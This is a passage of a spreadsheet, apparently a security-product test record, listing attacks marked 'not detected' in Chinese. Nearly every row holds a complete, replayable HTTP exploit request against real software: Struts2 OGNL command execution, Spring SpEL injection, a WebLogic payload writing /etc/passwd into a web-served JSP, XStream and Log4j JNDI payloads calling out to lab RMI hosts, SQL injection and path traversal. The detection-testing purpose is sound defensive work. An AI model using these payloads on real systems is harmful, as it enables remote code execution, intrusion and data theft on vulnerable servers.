    <row r="10" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>S2-032 远程代码执行1(CVE-2016-3081)</t>
        </is>
      </c>
      <c r="B10" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C10" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&amp;pp=%5C%5CA&amp;ppp=%20&amp;encoding=UTF-8&amp;cmd=id HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D10" s="0">
        <f>_xlfn.ENCODEURL(C10)</f>
        <v/>
      </c>
    </row>
    <row r="11" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>S2-045 远程代码执行(CVE-2017-5638)</t>
        </is>
      </c>
      <c r="B11" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C11" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: identity
Content-Type: "%{(#xxx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"whoami"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
</t>
        </is>
      </c>
      <c r="D11" s="0">
        <f>_xlfn.ENCODEURL(C11)</f>
        <v/>
      </c>
    </row>
    <row r="12" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>S2-057 远程命令执行(CVE-2018-11776)</t>
        </is>
      </c>
      <c r="B12" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C12" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /struts2-showcase/$%7B233*233%7D/actionChain1.action HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D12" s="0">
        <f>_xlfn.ENCODEURL(C12)</f>
        <v/>
      </c>
    </row>
    <row r="13" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Spring Data Rest 远程命令执行(CVE-2017-8046)</t>
        </is>
      </c>
      <c r="B13" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C13" s="0" t="inlineStr">
        <is>
          <t>PATCH /customers/1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 200
Accept-Encoding: identity
Content-Type: application/json-patch+json
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]</t>
        </is>
      </c>
      <c r="D13" s="0">
        <f>_xlfn.ENCODEURL(C13)</f>
        <v/>
      </c>
    </row>
    <row r="14" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>zabbix SQL注入_1</t>
        </is>
      </c>
      <c r="B14" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C14" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /latest.php?output=ajax&amp;sid=6398f8cc76b768d6&amp;favobj=toggle&amp;toggle_open_state=1&amp;toggle_ids[]=updatexml(0,concat(0xa,user()),0) HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D14" s="0">
        <f>_xlfn.ENCODEURL(C14)</f>
        <v/>
      </c>
    </row>
    <row r="15" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Weblogic远程命令执行(CVE-2019-2729)</t>
        </is>
      </c>
      <c r="B15" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C15" s="0" t="inlineStr">
        <is>
          <t>POST /_async/AsyncResponseService HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 831
Accept-Encoding: identity
SOAPAction: 
cmd: whoami
content-type: text/xml
&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;
&lt;soapenv:Header&gt;
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;/bin/bash&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;-c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;echo `cat /etc/passwd` &gt;  servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/cheat.jsp
&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;</t>
        </is>
      </c>
      <c r="D15" s="0">
        <f>_xlfn.ENCODEURL(C15)</f>
        <v/>
      </c>
    </row>
    <row r="16" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>S2-045远程代码执行_1</t>
        </is>
      </c>
      <c r="B16" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C16" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 0
Accept-Encoding: identity
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo pwn^test123 pwn$1test123').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
</t>
        </is>
      </c>
      <c r="D16" s="0">
        <f>_xlfn.ENCODEURL(C16)</f>
        <v/>
      </c>
    </row>
    <row r="17" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>S2-057 远程命令执行_1</t>
        </is>
      </c>
      <c r="B17" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C17" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /struts2-showcase/$%7B233*233%7D/actionChain1.action HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D17" s="0">
        <f>_xlfn.ENCODEURL(C17)</f>
        <v/>
      </c>
    </row>
    <row r="18" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>Tomcat PUT任意文件上传_2</t>
        </is>
      </c>
      <c r="B18" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C18" s="0" t="inlineStr">
        <is>
          <t>PUT /test1.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 11
Accept-Encoding: identity
Content-Type: text/plain
test put111</t>
        </is>
      </c>
      <c r="D18" s="0">
        <f>_xlfn.ENCODEURL(C18)</f>
        <v/>
      </c>
    </row>
    <row r="19" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A19" s="2" t="inlineStr">
        <is>
          <t>Stream 反序列化命令执行</t>
        </is>
      </c>
      <c r="B19" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C19" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 2984
Accept-Encoding: identity
&lt;sorted-set&gt;
 &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
  &lt;type&gt;ysomap&lt;/type&gt;
  &lt;value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'&gt;
   &lt;m__DTMXRTreeFrag&gt;
     &lt;m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'&gt;
      &lt;m__size&gt;-10086&lt;/m__size&gt;
      &lt;m__mgrDefault&gt;
       &lt;__overrideDefaultParser&gt;false&lt;/__overrideDefaultParser&gt;
       &lt;m__incremental&gt;false&lt;/m__incremental&gt;
       &lt;m__source__location&gt;false&lt;/m__source__location&gt;
       &lt;m__dtms&gt;
        &lt;null/&gt;
       &lt;/m__dtms&gt;
       &lt;m__defaultHandler/&gt;
      &lt;/m__mgrDefault&gt;
      &lt;m__shouldStripWS&gt;false&lt;/m__shouldStripWS&gt;
      &lt;m__indexing&gt;false&lt;/m__indexing&gt;
      &lt;m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'&gt;
       &lt;fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'&gt;
        &lt;javax.sql.rowset.BaseRowSet&gt;
          &lt;default&gt;
          &lt;concurrency&gt;1008&lt;/concurrency&gt;
          &lt;escapeProcessing&gt;true&lt;/escapeProcessing&gt;
          &lt;fetchDir&gt;1000&lt;/fetchDir&gt;
          &lt;fetchSize&gt;0&lt;/fetchSize&gt;
          &lt;isolation&gt;2&lt;/isolation&gt;
          &lt;maxFieldSize&gt;0&lt;/maxFieldSize&gt;
          &lt;maxRows&gt;0&lt;/maxRows&gt;
          &lt;queryTimeout&gt;0&lt;/queryTimeout&gt;
          &lt;readOnly&gt;true&lt;/readOnly&gt;
          &lt;rowSetType&gt;1004&lt;/rowSetType&gt;
          &lt;showDeleted&gt;false&lt;/showDeleted&gt;
          &lt;dataSource&gt;rmi://192.168.248.132:1099/hyozdi&lt;/dataSource&gt;
          &lt;listeners/&gt;
          &lt;params/&gt;
         &lt;/default&gt;
        &lt;/javax.sql.rowset.BaseRowSet&gt;
        &lt;com.sun.rowset.JdbcRowSetImpl&gt;
         &lt;default/&gt;
        &lt;/com.sun.rowset.JdbcRowSetImpl&gt;
       &lt;/fPullParserConfig&gt;
       &lt;fConfigSetInput&gt;
        &lt;class&gt;com.sun.rowset.JdbcRowSetImpl&lt;/class&gt;
        &lt;name&gt;setAutoCommit&lt;/name&gt;
        &lt;parameter-types&gt;
         &lt;class&gt;boolean&lt;/class&gt;
        &lt;/parameter-types&gt;
       &lt;/fConfigSetInput&gt;
       &lt;fConfigParse reference='../fConfigSetInput'/&gt;
       &lt;fParseInProgress&gt;false&lt;/fParseInProgress&gt;
      &lt;/m__incrementalSAXSource&gt;
      &lt;m__walker&gt;
       &lt;nextIsRaw&gt;false&lt;/nextIsRaw&gt;
      &lt;/m__walker&gt;
      &lt;m__endDocumentOccured&gt;false&lt;/m__endDocumentOccured&gt;
      &lt;m__idAttributes/&gt;
      &lt;m__textPendingStart&gt;-1&lt;/m__textPendingStart&gt;
      &lt;m__useSourceLocationProperty&gt;false&lt;/m__useSourceLocationProperty&gt;
      &lt;m__pastFirstElement&gt;false&lt;/m__pastFirstElement&gt;
     &lt;/m__dtm&gt;
     &lt;m__dtmIdentity&gt;1&lt;/m__dtmIdentity&gt;
   &lt;/m__DTMXRTreeFrag&gt;
   &lt;m__dtmRoot&gt;1&lt;/m__dtmRoot&gt;
   &lt;m__allowRelease&gt;false&lt;/m__allowRelease&gt;
  &lt;/value&gt;
 &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
 &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
  &lt;type&gt;ysomap&lt;/type&gt;
  &lt;value class='com.sun.org.apache.xpath.internal.objects.XString'&gt;
   &lt;m__obj class='string'&gt;test&lt;/m__obj&gt;
  &lt;/value&gt;
 &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
&lt;/sorted-set&gt;
</t>
        </is>
      </c>
      <c r="D19" s="0">
        <f>_xlfn.ENCODEURL(C19)</f>
        <v/>
      </c>
    </row>
    <row r="20" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A20" s="2" t="inlineStr">
        <is>
          <t>Spring Data Rest 远程命令执行</t>
        </is>
      </c>
      <c r="B20" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C20" s="0" t="inlineStr">
        <is>
          <t>PATCH /customers/1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 200
Accept-Encoding: identity
Content-Type: application/json-patch+json
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]</t>
        </is>
      </c>
      <c r="D20" s="0">
        <f>_xlfn.ENCODEURL(C20)</f>
        <v/>
      </c>
    </row>
    <row r="21" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A21" s="2" t="inlineStr">
        <is>
          <t>Spring Data Commons 远程命令执行</t>
        </is>
      </c>
      <c r="B21" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C21" s="0" t="inlineStr">
        <is>
          <t>POST /users?page&amp;size=5 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Content-Length: 124
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&amp;password=&amp;repeatedPassword=</t>
        </is>
      </c>
      <c r="D21" s="0">
        <f>_xlfn.ENCODEURL(C21)</f>
        <v/>
      </c>
    </row>
    <row r="22" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A22" s="2" t="inlineStr">
        <is>
          <t>Ruby on Rails 路径穿越与任意文件读取_2</t>
        </is>
      </c>
      <c r="B22" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C22" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /robots HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D22" s="0">
        <f>_xlfn.ENCODEURL(C22)</f>
        <v/>
      </c>
    </row>
    <row r="23" ht="18" customHeight="1" s="6" thickBot="1">
      <c r="A23" s="2" t="inlineStr">
        <is>
          <t>Neo4j Shell Server 反序列化漏洞利用</t>
        </is>
      </c>
      <c r="B23" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C23" s="0" t="inlineStr">
        <is>
          <t>Q퀅w_x000F__x0001_벓퀀_x0001_4=ʀ
s}_x0002__x000F_java.rmi.Remote_x001B_org.neo4j.shell.ShellServerpxr_x0017_java.lang.reflect.Proxy᧚ ̐C˂_x0001_L_x0001_ht%Ljava/lang/reflect/InvocationHandler;pxpsr-java.rmi.server.RemoteObjectInvocationHandler_x0002__x0002_pxr_x001C_java.rmi.server.RemoteObjectӡ_x000C_a3_x001E__x0003_pxpw8
UnicastRef_x000F_192.168.248.133.D_x0006_HꫲS퀀_x0001_4=ʀ_x0001__x0001_x</t>
        </is>
      </c>
      <c r="D23" s="0">
        <f>_xlfn.ENCODEURL(C23)</f>
        <v/>
      </c>
    </row>
    <row r="24" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A24" s="2" t="inlineStr">
        <is>
          <t>mini_httpd任意文件读取</t>
        </is>
      </c>
      <c r="B24" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C24" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D24" s="0">
        <f>_xlfn.ENCODEURL(C24)</f>
        <v/>
      </c>
    </row>
    <row r="25" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A25" s="2" t="inlineStr">
        <is>
          <t>Jetty WEB-INF 敏感信息泄露</t>
        </is>
      </c>
      <c r="B25" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C25" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /%25u002e/WEB-INF/web.xml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D25" s="0">
        <f>_xlfn.ENCODEURL(C25)</f>
        <v/>
      </c>
    </row>
    <row r="26" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A26" s="2" t="inlineStr">
        <is>
          <t>Spring Security OAuth RCE 漏洞利用</t>
        </is>
      </c>
      <c r="B26" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C26" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /oauth/authorize?response_type=${2*3}&amp;client_id=acme&amp;scope=openid&amp;redirect_uri=http://test HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Accept-Encoding: identity
Authorization: Basic YWRtaW46YWRtaW4=
</t>
        </is>
      </c>
      <c r="D26" s="0">
        <f>_xlfn.ENCODEURL(C26)</f>
        <v/>
      </c>
    </row>
    <row r="27" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A27" s="2" t="inlineStr">
        <is>
          <t>uWSGI PHP目录穿越</t>
        </is>
      </c>
      <c r="B27" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C27" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D27" s="0">
        <f>_xlfn.ENCODEURL(C27)</f>
        <v/>
      </c>
    </row>
    <row r="28" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A28" s="2" t="inlineStr">
        <is>
          <t>Spring Messaging 远程命令执行(CVE-2018-1270)</t>
        </is>
      </c>
      <c r="B28" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C28" s="0" t="inlineStr">
        <is>
          <t>POST /gs-guide-websocket/754/fg20hkt2/xhr_send?t=1646903360968 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 134
Accept-Encoding: identity
["SUBSCRIBE\nselector:T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')\nid:sub-0\ndestination:/topic/greetings\n\n\u0000"]</t>
        </is>
      </c>
      <c r="D28" s="0">
        <f>_xlfn.ENCODEURL(C28)</f>
        <v/>
      </c>
    </row>
    <row r="29" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A29" s="2" t="inlineStr">
        <is>
          <t>S2-046 远程代码执行(CVE-2017-5638)</t>
        </is>
      </c>
      <c r="B29" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C29" s="0" t="inlineStr">
        <is>
          <t>POST /doUpload.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Content-Length: 1091
Accept-Encoding: identity
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWx1nMTn6ALWIDGXH
------WebKitFormBoundaryWx1nMTn6ALWIDGXH
Content-Disposition: form-data; name="upload"; filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x0b"
Content-Type: image/jpeg
111
------WebKitFormBoundaryWx1nMTn6ALWIDGXH
Content-Disposition: form-data; name="caption"
------WebKitFormBoundaryWx1nMTn6ALWIDGXH--</t>
        </is>
      </c>
      <c r="D29" s="0">
        <f>_xlfn.ENCODEURL(C29)</f>
        <v/>
      </c>
    </row>
    <row r="30" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A30" s="2" t="inlineStr">
        <is>
          <t>Apache Log4j2 lookup JNDI 注入</t>
        </is>
      </c>
      <c r="B30" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C30" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /solr/admin/cores?action=${jndi:rmi://192.168.248.133:1099/sm0syp} HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D30" s="0">
        <f>_xlfn.ENCODEURL(C30)</f>
        <v/>
      </c>
    </row>
    <row r="31" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A31" s="2" t="inlineStr">
        <is>
          <t>XStream 反序列化命令执行</t>
        </is>
      </c>
      <c r="B31" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C31" s="0" t="inlineStr">
        <is>
          <t>POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 1677
Accept-Encoding: identity
Content-Type: application/xml
&lt;java.util.PriorityQueue serialization='custom'&gt; &lt;unserializable-parents/&gt; &lt;java.util.PriorityQueue&gt; &lt;default&gt; &lt;size&gt;2&lt;/size&gt; &lt;/default&gt; &lt;int&gt;3&lt;/int&gt; &lt;javax.naming.ldap.Rdn_-RdnEntry&gt; &lt;type&gt;12345&lt;/type&gt; &lt;value class='com.sun.org.apache.xpath.internal.objects.XString'&gt; &lt;m__obj class='string'&gt;com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content&lt;/m__obj&gt; &lt;/value&gt; &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt; &lt;javax.naming.ldap.Rdn_-RdnEntry&gt; &lt;type&gt;12345&lt;/type&gt; &lt;value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'&gt; &lt;message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'&gt; &lt;parsedMessage&gt;true&lt;/parsedMessage&gt; &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt; &lt;bodyParts/&gt; &lt;sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'&gt; &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt; &lt;nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'&gt; &lt;aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'&gt; &lt;candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'&gt; &lt;names&gt; &lt;string&gt;aa&lt;/string&gt; &lt;string&gt;aa&lt;/string&gt; &lt;/names&gt; &lt;ctx&gt; &lt;environment/&gt; &lt;registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'&gt; &lt;java.rmi.server.RemoteObject&gt; &lt;string&gt;UnicastRef&lt;/string&gt; &lt;string&gt;192.168.248.132&lt;/string&gt; &lt;int&gt;4444&lt;/int&gt; &lt;long&gt;0&lt;/long&gt; &lt;int&gt;0&lt;/int&gt; &lt;long&gt;0&lt;/long&gt; &lt;short&gt;0&lt;/short&gt; &lt;boolean&gt;false&lt;/boolean&gt; &lt;/java.rmi.server.RemoteObject&gt; &lt;/registry&gt; &lt;host&gt;192.168.248.132&lt;/host&gt; &lt;port&gt;4444&lt;/port&gt; &lt;/ctx&gt; &lt;/candidates&gt; &lt;/aliases&gt; &lt;/nullIter&gt; &lt;/sm&gt; &lt;/message&gt; &lt;/value&gt; &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt; &lt;/java.util.PriorityQueue&gt; &lt;/java.util.PriorityQueue&gt;</t>
        </is>
      </c>
      <c r="D31" s="0">
        <f>_xlfn.ENCODEURL(C31)</f>
        <v/>
      </c>
    </row>
    <row r="32" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A32" s="2" t="inlineStr">
        <is>
          <t>Fastjson 1.2.24 反序列化导致任意命令执行</t>
        </is>
      </c>
      <c r="B32" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C32" s="0" t="inlineStr">
        <is>
          <t>POST /testfj HTTP/1.1
